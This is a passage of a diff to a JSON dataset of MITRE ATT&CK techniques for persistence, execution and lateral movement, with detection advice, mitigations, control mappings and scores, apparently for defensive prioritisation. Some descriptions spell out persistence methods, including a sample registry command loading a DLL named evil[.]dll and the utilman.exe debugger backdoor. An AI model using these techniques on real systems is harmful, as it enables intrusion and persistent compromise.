+                "detection": "Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).",
                 "mitigations": [
                     {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
                     },
                     {
-                        "mid": "M1052",
-                        "name": "User Account Control",
-                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
-                        "url": "https://attack.mitre.org/mitigations/M1052"
-                    }
-                ]
-            },
-            {
-                "tid": "T1546.012",
-                "name": "Event Triggered Execution: Image File Execution Options Injection",
-                "url": "https://attack.mitre.org/techniques/T1546/012",
-                "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g  notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)",
-                "detection": "Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)",
-                "mitigations": []
-            },
-            {
-                "tid": "T1546.013",
-                "name": "Event Triggered Execution: PowerShell Profile",
-                "url": "https://attack.mitre.org/techniques/T1546/013",
-                "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (profile.ps1) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)",
-                "detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.",
-                "mitigations": [
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
                     },
                     {
                         "mid": "M1022",
                         "name": "Restrict File and Directory Permissions",
                         "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
                         "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
                     }
                 ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
             },
             {
-                "tid": "T1546.014",
-                "name": "Event Triggered Execution: Emond",
-                "url": "https://attack.mitre.org/techniques/T1546/014",
-                "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\n\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.",
-                "detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    }
-                ]
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 1.0710943547619047,
+        "adjusted_score": 1.0710943547619047,
+        "has_car": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-11",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.20476190476190478,
+            "mitigation_score": 0.38181818181818183,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.66633245
+    },
+    {
+        "tid": "T1569.001",
+        "name": "System Services: Launchctl",
+        "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nAdversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)\n",
+        "url": "https://attack.mitre.org/techniques/T1569/001",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \n\nMonitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Service: Service Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1569",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.4714285714285714,
+        "adjusted_score": 0.4714285714285714,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-11",
+            "CM-5",
+            "IA-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1569.002",
+        "name": "System Services: Service Execution",
+        "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.",
+        "url": "https://attack.mitre.org/techniques/T1569/002",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Service: Service Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1569",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             },
             {
-                "tid": "T1546.015",
-                "name": "Event Triggered Execution: Component Object Model Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1546/015",
-                "description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. \n\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. ",
-                "detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.  \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ",
-                "mitigations": []
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
-        "mitigations": [],
-        "cumulative_score": 0.6654552538095239,
-        "adjusted_score": 0.6654552538095239,
-        "has_car": false,
+        "cumulative_score": 0.319047619047619,
+        "adjusted_score": 0.319047619047619,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [],
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
         "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
             "CM-2",
+            "CM-5",
             "CM-6",
-            "IA-9",
+            "CM-7",
+            "IA-2",
+            "SI-3",
+            "SI-4",
             "SI-7"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.22380952380952382,
-            "mitigation_score": 0.07272727272727272,
-            "detection_score": 0.39
-        },
-        "choke_point_score": 0.2,
-        "prevalence_score": 0.24164573
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1547",
-        "name": "Boot or Logon Autostart Execution",
-        "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.",
-        "url": "https://attack.mitre.org/techniques/T1547",
+        "tid": "T1570",
+        "name": "Lateral Tool Transfer",
+        "description": "Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.",
+        "url": "https://attack.mitre.org/techniques/T1570",
         "tactics": [
-            "Persistence",
-            "Privilege Escalation"
+            "Lateral Movement"
         ],
-        "detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns)  Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.",
+        "detection": "Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.",
         "platforms": [
             "Linux",
             "Windows",
@@ -13598,738 +36397,485 @@
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Driver: Driver Load",
             "File: File Creation",
-            "File: File Modification",
-            "Kernel: Kernel Module Load",
-            "Module: Module Load",
-            "Process: OS API Execution",
-            "Process: Process Creation",
-            "Windows Registry: Windows Registry Key Creation",
-            "Windows Registry: Windows Registry Key Modification"
+            "File: File Metadata",
+            "Named Pipe: Named Pipe Metadata",
+            "Network Share: Network Share Access",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1547.001",
-                "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder",
-                "url": "https://attack.mitre.org/techniques/T1547/001",
-                "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",
-                "detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1547.002",
-                "name": "Boot or Logon Autostart Execution: Authentication Package",
-                "url": "https://attack.mitre.org/techniques/T1547/002",
-                "description": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.",
-                "detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
-                "mitigations": [
-                    {
-                        "mid": "M1025",
-                        "name": "Privileged Process Integrity",
-                        "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
-                        "url": "https://attack.mitre.org/mitigations/M1025"
-                    }
-                ]
-            },
-            {
-                "tid": "T1547.003",
-                "name": "Boot or Logon Autostart Execution: Time Providers",
-                "url": "https://attack.mitre.org/techniques/T1547/003",
-                "description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)",
-                "detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)",
-                "mitigations": [
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1024",
-                        "name": "Restrict Registry Permissions",
-                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                        "url": "https://attack.mitre.org/mitigations/M1024"
-                    }
-                ]
-            },
-            {
-                "tid": "T1547.004",
-                "name": "Boot or Logon Autostart Execution: Winlogon Helper DLL",
-                "url": "https://attack.mitre.org/techniques/T1547/004",
-                "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.",
